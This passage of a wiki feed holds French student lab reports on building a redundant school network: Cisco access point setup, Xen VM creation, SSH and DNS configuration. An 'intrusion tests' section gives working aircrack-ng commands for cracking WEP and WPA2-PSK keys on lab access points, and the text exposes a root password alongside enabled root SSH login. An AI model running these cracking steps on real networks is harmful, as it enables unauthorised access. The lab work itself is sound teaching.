&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;br /&gt;
&lt;br /&gt;
= Configuration point d'accès WiFI =&lt;br /&gt;
&lt;br /&gt;
[En cours]&lt;br /&gt;
Configuration du point d'accès WiFi E304 (primaire) :&lt;br /&gt;
&lt;br /&gt;
Installation de minicom sur macos : &lt;br /&gt;
 brew install minicom&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'access point connecté en USB (mac Os):&lt;br /&gt;
 ls /dev/cu*&lt;br /&gt;
&lt;br /&gt;
On obtient (en branchant et débranchant on identifie l'appareil qui apparait): &lt;br /&gt;
 /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur WiFi :&lt;br /&gt;
 minicom -os&lt;br /&gt;
&lt;br /&gt;
Configuration à ajouter :&lt;br /&gt;
 Nom de device : /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
 Baudrate : 9600 8N1&lt;br /&gt;
&lt;br /&gt;
Configuration du point d'accès WiFi :&lt;br /&gt;
Source : https://www.cisco.com/en/US/docs/routers/access/800/850/software/configuration/guide/wireless.html&lt;br /&gt;
&lt;br /&gt;
 enable =&amp;gt; Passer en route (mdp : Cisco si par défaut)&lt;br /&gt;
 int sh =&amp;gt; pour trouver le nom de l'interface radio principale&lt;br /&gt;
 conf t =&amp;gt; Passer en mode configuration&lt;br /&gt;
 int dot11radio0 =&amp;gt; On se place sur la première interface radio de l'AP&lt;br /&gt;
 broadcast-key vlan 42 change 45&lt;br /&gt;
 broadcast-key vlan 1 change 45 =&amp;gt; Rafraichissement de la clé d'encryption toutes les 45 secondes &lt;br /&gt;
 ssid e304 =&amp;gt; Condiguration du SSID&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56998</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56998"/>
				<updated>2021-12-13T15:32:35Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* 3. Configuration des Machines Virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 11 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
&lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré la résolution de noms dans /etc/network/interfaces, en ajoutons la ligne suivante :&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''dns-nameservers 8.8.8.8 8.8.4.4'''&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
Puis nous avons vérifié son fonctionnement à l'aide d'un :&lt;br /&gt;
 ping www.google.com&lt;br /&gt;
 ...&lt;br /&gt;
 --- www.google.com ping statistics ---&lt;br /&gt;
 5 packets transmitted, 5 received, 0% packet loss, time 4005ms&lt;br /&gt;
&lt;br /&gt;
Configuration du SSH &lt;br /&gt;
&lt;br /&gt;
Dans /etc/ssh/sshd_config, ajout des lignes :&lt;br /&gt;
 Port 2223&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis :&lt;br /&gt;
 &amp;gt; systemctl restart ssh&lt;br /&gt;
 &amp;gt; systemctl status ssh&lt;br /&gt;
 ssh.service - OpenBSD Secure Shell server&lt;br /&gt;
     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: e&amp;gt;&lt;br /&gt;
     Active: active (running) since Mon 2021-11-29 14:47:49 UTC; 2s ago&lt;br /&gt;
       Docs: man:sshd(8)&lt;br /&gt;
             man:sshd_config(5)&lt;br /&gt;
    Process: 3679 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)&lt;br /&gt;
   Main PID: 3680 (sshd)&lt;br /&gt;
      Tasks: 1 (limit: 230)&lt;br /&gt;
     Memory: 1.3M&lt;br /&gt;
        CPU: 21ms&lt;br /&gt;
     CGroup: /system.slice/ssh.service&lt;br /&gt;
             `-3680 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups&lt;br /&gt;
&lt;br /&gt;
Puis nous testons le SSH depuis le terminal de la Zabeth :&lt;br /&gt;
 &amp;gt; ssh root@193.48.57.177 -p 2223&lt;br /&gt;
 password : glopglopglop&lt;br /&gt;
&lt;br /&gt;
Nous arrivons à nous connecter, la configuration du SSh est donc un succès.&lt;br /&gt;
&lt;br /&gt;
Configuration du DNS :&lt;br /&gt;
&lt;br /&gt;
On a installé le package bind9 :&lt;br /&gt;
 &amp;gt;apt install bind9&lt;br /&gt;
&lt;br /&gt;
Sur le site gandit.net, nous avons modifié : &lt;br /&gt;
&lt;br /&gt;
Fenêtre Glue Records : ns1.paixdieu.site | 193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Fenêtre Serveurs de noms :&lt;br /&gt;
&lt;br /&gt;
DNS Primaire : ns1.paixdieu.site | DNS Secondaire : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/resolv.conf, ajout de la ligne :&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
Afin de configurer le DNS par defaut.&lt;br /&gt;
&lt;br /&gt;
Puis nous passons à la configuration du DNS primaire :&lt;br /&gt;
On ajoute donc une zone lié à notre domaine paixdieu.site de type master et le chemin de son fichier de configuration et on permet les transferts d'informations avec le DNS secondaire ns6.gandi.net d'IP 217.70.177.40.&lt;br /&gt;
&lt;br /&gt;
On ajoute donc les lignes suivantes dans /etc/bind/named.conf.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/named.conf.site&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; IN {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.paixdieu.site&amp;quot;;&lt;br /&gt;
         allow-transfer { [IP ns6.gandi.net]; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Puis nous configurons la zone paixdieu.site, pour cela on ajoute les ns.&lt;br /&gt;
On ajoute les lignes suivantes dans /etc/bind/db.paixdieu.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/db.paixdieu.site&lt;br /&gt;
&lt;br /&gt;
[esquisse à compléter]&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;br /&gt;
&lt;br /&gt;
